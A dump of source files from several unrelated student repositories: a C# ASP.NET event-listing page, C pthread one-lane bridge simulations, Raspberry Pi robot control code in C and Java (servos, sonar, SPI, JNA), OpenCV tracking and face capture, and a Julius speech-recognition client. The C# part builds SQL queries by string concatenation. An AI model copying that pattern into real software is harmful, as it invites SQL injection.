fiecareEvenimentLaCareEsteOrganizator.Close();
}
foreach (int idEvent in idFiecareEveniment)
{
query = "SELECT id,nume,data_inceperii,oras from evenimente where id = " + idEvent;
cmd.CommandText = query;
SqlDataReader InfoEvenimente = cmd.ExecuteReader();
while (InfoEvenimente.Read())
{
DataRow NewRow = Table_Evenimente.NewRow(); //un nou rand!!!
NewRow[0] = InfoEvenimente.GetInt32(0);
NewRow[1] = InfoEvenimente.GetString(1);
NewRow[2] = InfoEvenimente.GetDateTime(2).ToString("dd MM yyyy");
//LabelMesajEroare.Text += " Opa ";
NewRow[3] = InfoEvenimente.GetString(3);
//LabelMesajEroare.Text += " Opa ";
Table_Evenimente.Rows.Add(NewRow);
}
InfoEvenimente.Close();
}
GridView_listaEvenimenteOrganizate.DataSource = Table_Evenimente;
GridView_listaEvenimenteOrganizate.DataBind();
int index_eveniment = 0; //pentru fiecare id de eveniment
foreach (GridViewRow row in GridView_listaEvenimenteOrganizate.Rows)
{
int i = 0;
LinkButton accepta = new LinkButton();
accepta.ID = "a" + idFiecareEveniment[index_eveniment].ToString(); //fiecare buton are id-ul evenimentului pe care il refera
accepta.Text = "Renunta";
accepta.Click += new EventHandler(refuzaCaOrganizator);
row.Cells[i].Controls.Add(accepta);
i++;
LinkButton linkCatreEveniment= new LinkButton();
linkCatreEveniment.ID = "l" + idFiecareEveniment[index_eveniment].ToString();
linkCatreEveniment.Text = "Click";
linkCatreEveniment.Click += new EventHandler(catrePaginaEveniment);
row.Cells[i].Controls.Add(linkCatreEveniment);
index_eveniment++;
}
}
catch (Exception ex)
{
LabelMesajEroare.Text += "Nu merrrrge " + ex.Message;
}
sqlConnection1.Close();
GridView_listaEvenimenteOrganizate.Visible = true;
}
}
protected void refuzaCaOrganizator(object sender, EventArgs e)
{
LinkButton eveniment = (LinkButton)sender;
int idEveniment = 0;
if (eveniment.Text == "Renunta")
{
idEveniment = Convert.ToInt32(eveniment.ID.Substring(1));
}
SqlCommand cmd = new SqlCommand();
try
{
String query = "Delete from organizeaza where id_eveniment = " + idEveniment + " and id_organizator = " + Session["id"];
sqlConnection1.Open();
cmd.CommandText = query;
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
cmd.ExecuteNonQuery();
}
catch (Exception ex)
{
LabelMesajEroare.Text = "Nu merge " + ex.Message;
}
sqlConnection1.Close();
Response.Redirect("profil.aspx");
}
protected void catrePaginaEveniment(object sender, EventArgs e)
{
LinkButton eveniment = (LinkButton)sender;
int idEveniment = 0;
if (eveniment.Text == "Click")
{
idEveniment = Convert.ToInt32(eveniment.ID.Substring(1));
}
Session["IdEvenimentSelectat"] = idEveniment;
// SearchBox.Text = Session["IdEvenimentSelectat"].ToString();
Response.Redirect("Eveniment.aspx");
}
}
|
ebdd49ca09fdc0a4135a26198df92c9ffacb553a
|
[
"C#"
] | 8
|
C#
|
B15IP/PIPv37
|
2eb03115bc05ba618725c04d46c82945fb068266
|
73b5141dfb54213e70aedf995d16f666a63e32a7
|
refs/heads/master
|
<repo_name>santhi-swaroop/assignment<file_sep>/os.c
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include<string.h>
#include<unistd.h>
#include <signal.h>
struct bridge {
int north_waiting;
int north_crossing;
int north_consecutive;
int south_waiting;
int south_crossing;
int south_consecutive;
pthread_mutex_t lock;
pthread_cond_t northbound_done;
pthread_cond_t southbound_done;
};
void bridge_init(struct bridge *b)
{
b->north_waiting = 0;
b->north_crossing = 0;;
b->north_consecutive = 0;
b->south_waiting = 0;
b->south_crossing = 0;
b->south_consecutive = 0;
pthread_mutex_init(&b->lock, NULL);
pthread_cond_init(&b->northbound_done,&b->lock);
pthread_cond_init(&b->southbound_done,&b->lock);
}
void *bridge_arrive_north(void * br)
{
struct bridge * b = (struct bridge *) br;
printf("NORTH car has arrived\n");
pthread_mutex_lock(&b->lock);
b->north_waiting++;
while ((b->south_crossing > 0) || ((b->south_waiting > 0) && (b->north_consecutive >= 5))) {
pthread_cond_wait(&b->southbound_done, &b->lock);
}
printf("NORTH car is on bridge\n");
b->north_waiting--;
b->north_crossing++;
b->north_consecutive++;
b->south_consecutive = 0;
pthread_mutex_unlock(&b->lock);
// bridge_leave_north(b);
}
void bridge_leave_north(struct bridge *b)
{
pthread_mutex_lock(&b->lock);
b->north_crossing--;
if (b->north_crossing == 0) {
pthread_cond_broadcast(&b->northbound_done);
}
pthread_mutex_unlock(&b->lock);
printf("NORTH car has left the bridge\n");
}
void *bridge_arrive_south(void * br)
{
struct bridge * b = (struct bridge *) br;
printf("SOUTH car has arrived\n");
pthread_mutex_lock(&b->lock);
b->south_waiting++;
while ((b->north_crossing > 0) || ((b->north_waiting > 0) && (b->south_consecutive >= 5))) {
pthread_cond_wait(&b->northbound_done, &b->lock);
}
printf("SOUTH car is on bridge\n");
b->south_waiting--;
b->south_crossing++;
b->south_consecutive++;
b->north_consecutive = 0;
pthread_mutex_unlock(&b->lock);
// bridge_leave_south(b);
}
void bridge_leave_south(struct bridge *b)
{
pthread_mutex_lock(&b->lock);
b->south_crossing--;
if (b->south_crossing == 0) {
pthread_cond_broadcast(&b->southbound_done);
}
pthread_mutex_unlock(&b->lock);
printf("SOUTH car has left the bridge\n");
}
int main() {
struct bridge b;
pthread_t tid[20];
pthread_create(&tid[0],NULL,bridge_arrive_north,(void *)&b);
pthread_create(&tid[1],NULL,bridge_arrive_north,(void *)&b);
pthread_create(&tid[2],NULL,bridge_arrive_north,(void *)&b);
pthread_create(&tid[3],NULL,bridge_arrive_south,(void *)&b);
pthread_create(&tid[4],NULL,bridge_arrive_south,(void *)&b);
pthread_create(&tid[5],NULL,bridge_arrive_north,(void *)&b);
pthread_create(&tid[6],NULL,bridge_arrive_north,(void *)&b);
pthread_create(&tid[7],NULL,bridge_arrive_north,(void *)&b);
for(int i=0;i<8;i++){
pthread_join(tid[i],NULL);
if(i!=5 && i!=6)
pthread_create(&tid[i+10],NULL,bridge_leave_north,(void *)&b);
else
pthread_create(&tid[i+10],NULL,bridge_leave_south,(void *)&b);
}
return 0;
}
<file_sep>/os2.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <pthread.h>
#define BRIDGE_DIRECTION_NORTH 0x01
#define BRIDGE_DIRECTION_SOUTH 0x02
typedef struct bridge
{
int cars;
int direction;
pthread_mutex_t mutex;
pthread_cond_t empty;
} bridge_t;
static bridge_t shared_bridge = {.cars = 0,.direction = BRIDGE_DIRECTION_SOUTH,.mutex = PTHREAD_MUTEX_INITIALIZER,.empty = PTHREAD_COND_INITIALIZER
};
static void arrive(bridge_t *bridge, int direction)
{
pthread_mutex_lock(&bridge->mutex);
while (bridge->cars > 0 || (bridge->cars > 5 || bridge->direction != direction))
pthread_cond_wait(&bridge->empty, &bridge->mutex);
if (bridge->cars == 0)
bridge->direction = direction;
bridge->cars++;
if(bridge->direction==1)
printf("crossing south to north\t num of cars on bridge = %d \n", bridge->cars);
else
printf("crossing north to south\t num of cars on bridge = %d \n", bridge->cars);
sleep(1);
pthread_mutex_unlock(&bridge->mutex);
}
static void leave(bridge_t *bridge)
{
pthread_mutex_lock(&bridge->mutex);
bridge->cars--;
pthread_cond_signal(&bridge->empty);
pthread_mutex_unlock(&bridge->mutex);
}
static void drive(bridge_t *bridge, int direction)
{
arrive(bridge, direction);
leave(bridge);
}
static void* north(void *data)
{
drive((bridge_t *) data, BRIDGE_DIRECTION_NORTH);
return NULL;
}
static void* south(void *data)
{
drive((bridge_t *) data, BRIDGE_DIRECTION_SOUTH);
return NULL;
}
static int run(int ns, int nn)
{
int i, n = ns + nn;
pthread_t thread[n];
for (i = 0; i < n; i++)
if (pthread_create(&thread[i], NULL, i < ns ? north : south, &shared_bridge))
{
printf("thread creation failed\n");
return EXIT_FAILURE;
}
for (i = 0; i < n; i++)
if (thread[i])
pthread_join(thread[i], NULL);
return EXIT_SUCCESS;
}
int main(int argc, char **argv)
{
int c, ns = 0, nn = 0;
printf("Enter the South and North cars:");
scanf("%d %d",&ns,&nn);
if (nn <= 0){
printf("number of cars going north must be > 0\n");
exit(EXIT_FAILURE);
}
else if (ns <= 0) {
printf("number of cars going south must be > 0\n");
exit(EXIT_FAILURE);
}
return run(ns, nn);
}
|
0793be325df2fc83f4a66d842fb27b8c6884bf78
|
[
"C"
] | 2
|
C
|
santhi-swaroop/assignment
|
2da0915b5672d90da1145934e96f1fa6a146e16f
|
9c81260b85c82f787517526ebc8d5eb0142ea9cf
|
refs/heads/master
|
<file_sep>#include <linux/module.h>
#include <linux/vermagic.h>
#include <linux/compiler.h>
MODULE_INFO(vermagic, VERMAGIC_STRING);
__visible struct module __this_module
__attribute__((section(".gnu.linkonce.this_module"))) = {
.name = KBUILD_MODNAME,
.init = init_module,
#ifdef CONFIG_MODULE_UNLOAD
.exit = cleanup_module,
#endif
.arch = MODULE_ARCH_INIT,
};
static const struct modversion_info ____versions[]
__used
__attribute__((section("__versions"))) = {
{ 0x331df01a, __VMLINUX_SYMBOL_STR(module_layout) },
{ 0x38f8fbac, __VMLINUX_SYMBOL_STR(usb_deregister) },
{ 0x66dae54, __VMLINUX_SYMBOL_STR(usb_register_driver) },
{ 0xfbc74f64, __VMLINUX_SYMBOL_STR(__copy_from_user) },
{ 0x659a3410, __VMLINUX_SYMBOL_STR(usb_alloc_coherent) },
{ 0x1afae5e7, __VMLINUX_SYMBOL_STR(down_interruptible) },
{ 0x4d41feb2, __VMLINUX_SYMBOL_STR(kmalloc_caches) },
{ 0x5d3af1c7, __VMLINUX_SYMBOL_STR(usb_alloc_urb) },
{ 0x12da5bb2, __VMLINUX_SYMBOL_STR(__kmalloc) },
{ 0xa9076c40, __VMLINUX_SYMBOL_STR(usb_register_dev) },
{ 0x35a58ba9, __VMLINUX_SYMBOL_STR(usb_get_dev) },
{ 0x275ef902, __VMLINUX_SYMBOL_STR(__init_waitqueue_head) },
{ 0xfa2a45e, __VMLINUX_SYMBOL_STR(__memzero) },
{ 0x7ff75090, __VMLINUX_SYMBOL_STR(kmem_cache_alloc_trace) },
{ 0x71d8b5d7, __VMLINUX_SYMBOL_STR(usb_kill_urb) },
{ 0x17e3f7be, __VMLINUX_SYMBOL_STR(_dev_info) },
{ 0xe9e34fd5, __VMLINUX_SYMBOL_STR(usb_deregister_dev) },
{ 0x3b821b8b, __VMLINUX_SYMBOL_STR(usb_free_urb) },
{ 0x37a0cba, __VMLINUX_SYMBOL_STR(kfree) },
{ 0x97cf203b, __VMLINUX_SYMBOL_STR(usb_put_dev) },
{ 0x1cfb04fa, __VMLINUX_SYMBOL_STR(finish_wait) },
{ 0x344b7739, __VMLINUX_SYMBOL_STR(prepare_to_wait_event) },
{ 0x1000e51, __VMLINUX_SYMBOL_STR(schedule) },
{ 0xf473ffaf, __VMLINUX_SYMBOL_STR(down) },
{ 0xad3706b1, __VMLINUX_SYMBOL_STR(usb_bulk_msg) },
{ 0xc1b18a5, __VMLINUX_SYMBOL_STR(usb_free_coherent) },
{ 0xd85cd67e, __VMLINUX_SYMBOL_STR(__wake_up) },
{ 0x4be7fb63, __VMLINUX_SYMBOL_STR(up) },
{ 0x9d669763, __VMLINUX_SYMBOL_STR(memcpy) },
{ 0xe9bff861, __VMLINUX_SYMBOL_STR(down_trylock) },
{ 0xecc20572, __VMLINUX_SYMBOL_STR(usb_submit_urb) },
{ 0x67c2fa54, __VMLINUX_SYMBOL_STR(__copy_to_user) },
{ 0x2e5810c6, __VMLINUX_SYMBOL_STR(__aeabi_unwind_cpp_pr1) },
{ 0x16305289, __VMLINUX_SYMBOL_STR(warn_slowpath_null) },
{ 0x27e1a049, __VMLINUX_SYMBOL_STR(printk) },
{ 0x917107f1, __VMLINUX_SYMBOL_STR(usb_find_interface) },
{ 0xb1ad28e0, __VMLINUX_SYMBOL_STR(__gnu_mcount_nc) },
};
static const char __module_depends[]
__used
__attribute__((section(".modinfo"))) =
"depends=";
MODULE_ALIAS("usb:v08DApFC00d*dc*dsc*dp*ic*isc*ip*in*");
MODULE_ALIAS("usb:v0FF8p0001d*dc*dsc*dp*ic*isc*ip*in*");
MODULE_INFO(srcversion, "3EB956F3CE48B57C8DC9BEF");
<file_sep>class TestApp implements IApplication {
public void Start(){
System.out.println("Start");
}
public void Update(){
System.out.println("Update");
}
public void Quit(){
System.out.println("Quit");
}
public int Cleanup(){
System.out.println("Cleanup done");
return 0;
}
public void Order(String word){
System.out.println(word);
}
public boolean IsRunning(){
return true;
}
}
<file_sep>public class PinkyuApp implements IApplication {
int x,y;
PinkyuTester pinkyu1 = PinkyuTester.INSTANCE;
public void Start() {
AudioLib.INSTANCE.play("ZensokuZensin.wav");
pinkyu1.main();
ArmLib.INSTANCE.init();
ArmLib.INSTANCE.lower();
ArmLib.INSTANCE.arm_open();
ArmLib.INSTANCE.arm_close();
ArmLib.INSTANCE.raise();
}
public void Quit() {
AudioLib.INSTANCE.play("MutekiSaikyo.wav");
pinkyu1 = null;
}
public void Update() {
}
public int Cleanup() {
return 0;
}
public void Order(String word) {
if (word.equals("pick")) {
//SurvoLib.INSTANCE.closeArm();
}
}
public boolean IsRunning(){
return true;
}
}
<file_sep>#include <stdio.h>
#include <wiringPi.h>
#include <string.h>
#include <unistd.h>
void setup_survo() {
if (wiringPiSetupGpio() == -1) {
fprintf(stderr, "WiringPi Initialize Error\n");
return;
}
pinMode(12,PWM_OUTPUT);
pwmSetMode(PWM_MODE_MS);
pwmSetClock(375);
pwmSetRange(1024);
printf("open, close, end, stop, or auto\n");
}
void openArm() {
printf("open arm\n");
pwmWrite(12, 125); //アームが開く
sleep(5);
pwmWrite(12,75);
}
void closeArm() {
printf("close arm\n");
pwmWrite(12, 25); //アームが閉じる
sleep(5);
pwmWrite(12, 75);
}
void stop() {
printf("stop movement\n");
pwmWrite(12, 75); //一時停止
}
void end() {
printf("end of program\n");
}
void automatic() {
printf("auto\n");
pwmWrite(12,125);
sleep(3);
pwmWrite(12,75);
sleep(1);
pwmWrite(12, 25);
sleep(3);
pwmWrite(12,75);
printf("auto finish\n");
}
int main() {
setup_survo();
openArm();
return 0;
}
<file_sep>public final class Shooter implements ShooterLib{
void shoot()
{
start_moter();
}
void stop_shoot()
{
stop_moter();
}
}<file_sep>import com.sun.jna.Library;
import com.sun.jna.Native;
public interface SurvoLib extends Library {
// loadLibraryの第一引数はあとで作成するlib***.soの***と一致させる。
String path = "/home/pi/work/robot/RobotPrograms/libsurvo12_ex.so";
SurvoLib INSTANCE = (SurvoLib) Native.loadLibrary(path, SurvoLib.class);
// Cの関数名と一致させる
void setup_survo();
void openArm();
void closeArm();
void stop();
void end();
void automatic();
}
<file_sep>#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include "/usr/include/linux/i2c-dev.h"
#include "signal.h"
#include "move_api.h"
void quit_func();
int quit_flg = 0;
int main( void ) {
int fd;
char filename[ 20 ];
char buf[ 10 ];
int res;
int range = 0;
//set signal handler
signal(SIGINT, quit_func);
// I2Cデータバスをオープン
sprintf( filename, "/dev/i2c-1" );
fd = open( filename, O_RDWR );
if ( fd < 0 ) {
printf( "Error on open\n" );
exit( 1 );
}
if ( ioctl( fd, I2C_SLAVE, ( 0xE2 >> 1 ) ) < 0 ) { // 0xE0(0x11100000) >> 1 = 0x70(0x01110000)
printf( "Error on slave address 0xE2\n" );
exit( 1 );
}
//setup movement
g_init();
while(!quit_flg)
{ // read from 0xE2
buf[ 0 ] = 0x00;
buf[ 1 ] = 0x51;
if ( ( write( fd, buf, 2 ) ) != 2 ) {
printf( "0xE2 Error send the read command\n" );
exit( 1 );
}
// Wait for the measurement
usleep( 66000 );
buf[ 0 ] = 0x02;
if ( ( write( fd, buf, 1 ) ) != 1 ) {
printf( "0xE2 Error on select the Range High Byte\n" );
exit( 1 );
}
if ( ( read( fd, buf, 1 ) ) != 1 ) {
printf( "0xE2 Error on read the Range High Byte\n" );
exit( 1 );
}
range = buf[ 0 ] << 8;
buf[ 0 ] = 0x03;
if ( ( write( fd, buf, 1 ) ) != 1 ) {
printf( "0xE2 Error on select the Range Low Byte\n" );
exit( 1 );
}
if ( ( read( fd, buf, 1 ) ) != 1 ) {
printf( "0xE2 Error on read the Range Low Byte\n" );
exit( 1 );
}
range |= buf[ 0 ];
printf("0xE2 Range=%d cm\n",range);
if(range <= 10){
g_stop();
}else{
g_go_straight(1,range);
}
}
g_quit();
close( fd );
return 0;
}
void quit_func(){
printf("quit\n");
quit_flg = 1;
}
<file_sep>// Module "core"
#include <opencv2/core/core.hpp>
// Module "highgui"
#include <opencv2/highgui/highgui.hpp>
// Module "imgproc"
#include <opencv2/imgproc/imgproc.hpp>
// Module "video"
#include <opencv2/video/video.hpp>
// Output
#include <iostream>
// Vector
#include <vector>
using namespace cv;
using namespace std;
int main(int argc, char** argv)
{
VideoCapture cap(0); //capture the video from web cam
int notFoundCount=0;
bool found=false;
if (!cap.isOpened()) // if not success, exit program
{
cout << "Cannot open the web cam" << endl;
return -1;
}
int measSize = 4;
int stateSize = 6;
int contrSize = 0;
unsigned int type = CV_32F;
KalmanFilter kf(stateSize, measSize, contrSize, type);
Mat meas(measSize, 1, type);
Mat state(stateSize, 1, type);
namedWindow("Control", CV_WINDOW_AUTOSIZE); //create a window called "Control"
int iLowH = 0;
int iHighH = 179;
int iLowS = 0;
int iHighS = 255;
int iLowV = 0;
int iHighV = 255;
//Create trackbars in "Control" window
cvCreateTrackbar("LowH", "Control", &iLowH, 179); //Hue (0 - 179)
cvCreateTrackbar("HighH", "Control", &iHighH, 179);
cvCreateTrackbar("LowS", "Control", &iLowS, 255); //Saturation (0 - 255)
cvCreateTrackbar("HighS", "Control", &iHighS, 255);
cvCreateTrackbar("LowV", "Control", &iLowV, 255); //Value (0 - 255)
cvCreateTrackbar("HighV", "Control", &iHighV, 255);
while (true)
{
Mat imgOriginal;
bool bSuccess = cap.read(imgOriginal); // read a new frame from video
if (!bSuccess) //if not success, break loop
{
cout << "Cannot read a frame from video stream" << endl;
break;
}
Mat imgHSV;
cvtColor(imgOriginal, imgHSV, COLOR_BGR2HSV); //Convert the captured frame from BGR to HSV
Mat imgThresholded;
inRange(imgHSV, Scalar(iLowH, iLowS, iLowV), Scalar(iHighH, iHighS, iHighV), imgThresholded); //Threshold the image
//morphological opening (remove small objects from the foreground)
erode(imgThresholded, imgThresholded, getStructuringElement(MORPH_ELLIPSE, Size(5, 5)));
dilate(imgThresholded, imgThresholded, getStructuringElement(MORPH_ELLIPSE, Size(5, 5)));
//morphological closing (fill small holes in the foreground)
dilate(imgThresholded, imgThresholded, getStructuringElement(MORPH_ELLIPSE, Size(5, 5)));
erode(imgThresholded, imgThresholded, getStructuringElement(MORPH_ELLIPSE, Size(5, 5)));
vector<vector<cv::Point>> contours;
findContours(imgThresholded, contours, CV_RETR_EXTERNAL,
CV_CHAIN_APPROX_NONE);
// >>>>> Filtering
vector<vector<cv::Point> > balls;
vector<cv::Rect> ballsBox;
for (size_t i = 0; i < contours.size(); i++)
{
cv::Rect bBox;
bBox = cv::boundingRect(contours[i]);
float ratio = (float)bBox.height / (float)bBox.width;
// Searching for a bBox almost square
if (ratio > 2.0 && bBox.area() >= 400 && ratio <6.0)
{
balls.push_back(contours[i]);
ballsBox.push_back(bBox);
}
}
for (size_t i = 0; i < balls.size(); i++)
{
cv::drawContours(imgOriginal, balls, i, CV_RGB(20, 150, 20), 1);
cv::rectangle(imgOriginal, ballsBox[i], CV_RGB(0, 255, 0), 2);
cv::Point center;
center.x = ballsBox[i].x + ballsBox[i].width / 2;
center.y = ballsBox[i].y + ballsBox[i].height / 2;
cv::circle(imgOriginal, center, 2, CV_RGB(20, 150, 20), -1);
stringstream sstr;
sstr << "(" << center.x << "," << center.y << ")";
cv::putText(imgOriginal, sstr.str(),
cv::Point(center.x + 3, center.y - 3),
cv::FONT_HERSHEY_SIMPLEX, 0.5, CV_RGB(20, 150, 20), 2);
cout << center.x << ", " << center.y << endl;
}
if (balls.size() == 0)
{
notFoundCount++;
cout << "notFoundCount:" << notFoundCount << endl;
if (notFoundCount >= 100)
{
found = false;
}
/*else
kf.statePost = state;*/
}
else
{
notFoundCount = 0;
meas.at<float>(0) = ballsBox[0].x + ballsBox[0].width / 2;
meas.at<float>(1) = ballsBox[0].y + ballsBox[0].height / 2;
meas.at<float>(2) = (float)ballsBox[0].width;
meas.at<float>(3) = (float)ballsBox[0].height;
if (!found) // First detection!
{
// >>>> Initialization
kf.errorCovPre.at<float>(0) = 1; // px
kf.errorCovPre.at<float>(7) = 1; // px
kf.errorCovPre.at<float>(14) = 1;
kf.errorCovPre.at<float>(21) = 1;
kf.errorCovPre.at<float>(28) = 1; // px
kf.errorCovPre.at<float>(35) = 1; // px
state.at<float>(0) = meas.at<float>(0);
state.at<float>(1) = meas.at<float>(1);
state.at<float>(2) = 0;
state.at<float>(3) = 0;
state.at<float>(4) = meas.at<float>(2);
state.at<float>(5) = meas.at<float>(3);
// <<<< Initialization
found = true;
}
else
kf.correct(meas); // Kalman Correction
//cout << "Measure matrix:" << endl << meas << endl;
}
imshow("Thresholded Image", imgThresholded); //show the thresholded image
imshow("Original", imgOriginal); //show the original image
if (waitKey(30) == 27) //wait for 'esc' key press for 30ms. If 'esc' key is pressed, break loop
{
cout << "esc key is pressed by user" << endl;
break;
}
}
return 0;
}<file_sep>#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <wiringPi.h>
#include <unistd.h>
#define MOTOROUT1 14
#define MOTOROUT2 15
void setup_lift() {
if ( wiringPiSetupGpio() == -1) {
printf("setup error");
return;
}
pinMode(MOTOROUT1, OUTPUT);
pinMode(MOTOROUT2, OUTPUT);
digitalWrite(MOTOROUT1, 0);
digitalWrite(MOTOROUT2, 0);
}
void up() {
digitalWrite(MOTOROUT1, 1);
sleep(3);
digitalWrite(MOTOROUT1, 0);
}
void down() {
digitalWrite(MOTOROUT2, 1);
sleep(3);
digitalWrite(MOTOROUT2, 0);
}
void stop() {
digitalWrite(MOTOROUT1, 0);
digitalWrite(MOTOROUT2, 0);
}
<file_sep>#include <stdio.h>
#include <stdlib.h>
#include <wiringPi.h>
#include <wiringPiSPI.h>
#define DEBUG 0
#define SPI_CHANNEL 0
#define SS_PORT 8
int main(int argc, char **argv){
int retCode;
int i;
int a2dChannel = atoi(argv[1]); // analog channel
int a2dVal = 0;
float a2dVol = 0;
float Vref = 5;
printf("Channel:%d\n", a2dChannel);
unsigned char data[3];
// SPI channel 0 ?? 1MHz ?ŊJ?n?B
if (wiringPiSPISetup(SPI_CHANNEL, 1000000) < 0)
{
printf("SPISetup failed:\n");
return 0;
}
if (wiringPiSetupGpio() == -1) {
printf("GPIO set up error\n");
return 0;
}
pinMode(SS_PORT, OUTPUT);
digitalWrite(SS_PORT, 1);
while(1) {
data[0] = 0b00000110 |( ((a2dChannel & 0x04) >> 2)); // first byte transmitted -> start bit -> (SGL/DIF = 1,D2=0)
data[1] = 0b00000000 |( ((a2dChannel & 0x03) << 6)); // second byte transmitted -> (D1=D0=0)
data[2] = 0; // third byte transmitted....don't care
digitalWrite(SS_PORT, 0);
retCode=wiringPiSPIDataRW (SPI_CHANNEL,data,sizeof(data));
digitalWrite(SS_PORT, 1);
a2dVal = (data[1]<< 8) & 0b111100000000; //first 4 bit
a2dVal |= (data[2] & 0xff);
a2dVol = (float)a2dVal/4095 * Vref;
printf("a2dVal=%d\n",a2dVal);
printf("a2dVol=%f[V]\n",a2dVol);
sleep(1);
}
}
<file_sep>import com.sun.jna.Library;
import com.sun.jna.Native;
public interface ShooterLib1 extends Library {
// loadLibraryの第一引数はあとで作成するlib***.soの***と一致させる。
String path = "/home/pi/work/robot/RobotPrograms/libshoot.so";
ShooterLib1 INSTANCE = (ShooterLib1) Native.loadLibrary(path, ShooterLib1.class);
// Cの関数名と一致させる
void start_moter();
void stop_moter();
}
<file_sep>#include <stdio.h>
#include <wiringPi.h>
#include <wiringPiSPI.h>
#include <string.h>
int init(){
printf("Init!\n");
}
int arm_open(){
printf("Open!\n");
}
int arm_close() {
printf("Close!\n");
}
int arm_fclose(){
printf("Fclose!\n");
}
int raise(){
printf("Raise!\n");
}
int lower(){
printf("Lower!\n");
}
int lower_t(int time){
printf("Lower_t!\n");
}
int stop() {
printf("Stop!\n");
}
int quit(){
printf("Quit!\n");
}
<file_sep>#include <opencv2/core.hpp>
#include <opencv2/videoio.hpp>
#include <opencv2/highgui.hpp>
#include <opencv2/video/tracking.hpp>
#include <opencv2/imgproc.hpp>
#include <opencv2/face.hpp>
#include <opencv2/objdetect.hpp>
#include <iostream>
#include <fstream>
#include <sstream>
#include <vector>
#include <sys/stat.h>
#include <sys/types.h>
#define CAMERA_U_IDX 0
#define PIX_LEN 300
using namespace cv;
using namespace cv::face;
using namespace std;
string fn_haar = "/usr/local/Cellar/opencv3/3.2.0/share/OpenCV/haarcascades/haarcascade_frontalface_default.xml";
string fn_csv = "/Users/okuokakouhei/java/eclipse/RobotCV/face.csv";
static void read_csv(const string& filename, vector<Mat>& images, vector<int>& labels, char separator = ';') {
std::ifstream file(filename.c_str(), ifstream::in);
if (!file) {
string error_message = "No valid input file was given, please check the given filename.";
CV_Error(CV_StsBadArg, error_message);
return;
}
string line, path, classlabel;
while (getline(file, line)) {
stringstream liness(line);
getline(liness, path, separator);
getline(liness, classlabel);
if(!path.empty() && !classlabel.empty()) {
images.push_back(imread(path, 0));
labels.push_back(atoi(classlabel.c_str()));
}
}
}
static void write_csv(const string& filename, vector<string>& paths, int uid) {
std::ofstream writing_file;
writing_file.open(filename, std::ios::app);
if (!writing_file) {
string error_message = "No valid input file was given, please check the given filename.";
CV_Error(CV_StsBadArg, error_message);
return;
}
for (int i = 0; i< paths.size(); i++) {
writing_file << paths[i] << ";" << uid << "\n";
}
writing_file << std::flush;
}
int registerUser(int uid, const char *name){
VideoCapture cap(0);
if(!cap.isOpened()) {
return -1;
}
Mat image;
string csv_file = "/Users/okuokakouhei/java/eclipse/RobotCV/face.csv";
string imagepath = "/Users/okuokakouhei/java/eclipse/RobotCV/images/";
imagepath += name;
if(mkdir(imagepath.c_str(), 0755)==0){
printf("フォルダ作成に成功しました。\n");
}else{
printf("フォルダ作成に失敗しました。\n");
}
imagepath += "/";
vector<string> paths;
int count = 0;
while(1) {
cap >> image;
string cascade_file = "/usr/local/Cellar/opencv3/3.2.0/share/OpenCV/haarcascades/haarcascade_frontalface_default.xml";
CascadeClassifier cascade;
cascade.load(cascade_file);
vector<Rect> faces;
cascade.detectMultiScale(image, faces, 1.1,3,0,Size(20,20));
Rect bmax;
for (int i = 0; i < faces.size(); i++){
bmax = faces[0];
for (size_t i = 1; i < faces.size(); i++) {
if (faces[i].area() > bmax.area()){
bmax = faces[i];
}
}
}
if (faces.size() == 0) {
continue;
}
cv::Mat roi_img(image, bmax);
rectangle(image, bmax,Scalar(0,200,0),3,CV_AA);
double y = (double)PIX_LEN / bmax.height;
double x = (double)PIX_LEN / bmax.width;
resize(roi_img, roi_img, Size(), x, y, INTER_CUBIC);
imshow("detect face",image);
char key = (char) waitKey(0);
if(key == 27) { //ESC
break;
} else if (key == 32){ //Space
string imgname = imagepath;
imgname += name;
imgname += to_string(count);
imgname += ".jpg";
std::cout << "Print:" << imgname << std::endl;
imwrite(imgname, roi_img);
paths.push_back(imgname);
count++;
} else {
}
}
cv::destroyAllWindows();
if (paths.size() > 0) {
write_csv(csv_file, paths, uid);
}
return 0;
}
int main(int argh, char* argv[]) {
if (argh != 3) {
fprintf(stderr, "./ [UID] [name]");
}
registerUser(atoi(argv[1]), argv[2]);
return 0;
}
<file_sep>int main(){
return shoot();
}
<file_sep>import java.io.*;
import java.net.*;
import javax.xml.parsers.*;
import org.w3c.dom.*;
import java.util.*;
class JuliusCliant{
private ICore core_;
public JuliusCliant(ICore core){
core_ = core;
}
public void Run(){
try{
Socket client = new Socket("localhost", 10500);
InputStream input = new DataInputStream(client.getInputStream());
BufferedReader reader = new BufferedReader(new InputStreamReader(input));
PrintStream output = new PrintStream(client.getOutputStream());
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
DocumentBuilder builder = factory.newDocumentBuilder();
String s;
StringBuilder sb;
while(true){
sb = new StringBuilder();
sb.append("<?xml version=\"1.0\" encoding=\"UTF-8\"?>");
while(true){
if((s = reader.readLine()) == null) continue;
if(s.toString().equals(".")){
String data = sb.toString().replaceAll("<s>", "[s]").replaceAll("</s>", "[/s]");
//System.out.println(data);
InputStream stream = new ByteArrayInputStream(data.getBytes());
Node root = builder.parse(stream);
Node first = root.getFirstChild();
if(first.getNodeName().equals("RECOGOUT")){
NodeList nL = first.getChildNodes();
for(int j = 0; j < nL.getLength(); j++){
Node n = nL.item(j);
if(n.getNodeName().equals("SHYPO")){
StringBuilder sbWord = new StringBuilder();
float cm = 0;
int num = 0;
NodeList wL = n.getChildNodes();
List<JuliusWord> jwl = new ArrayList<JuliusWord>();
for(int k = 0; k < wL.getLength(); k++){
Node w = wL.item(k);
if(w.getNodeName().equals("WHYPO")){
Element el = (Element)w;
if(el.getAttribute("WORD").equals("。")) continue;
if(el.getAttribute("WORD").equals("")) continue;
String word = el.getAttribute("WORD");
String classId = el.getAttribute("CLASSID");
String phone = el.getAttribute("PHONE");
String cmstr = el.getAttribute("CM");
System.out.println("WORD:" + word +" CLASSID: " + classId+" PHONE: "+phone + " CM:"+cmstr);
JuliusWord jw = new JuliusWord(word,phone, classId);
jwl.add(jw);
// sbWord.append(el.getAttribute("WORD"));
// cm += Float.parseFloat(el.getAttribute("CM"));
// num++;
}
}
core_.Order(jwl);
// System.out.println("WORDS:"+num);
// System.out.println(sbWord+":"+cm/num);
}
}
}
System.out.println(first.getNodeName());
break;
}
sb.append(s);
}
System.out.println("\n");
}
//
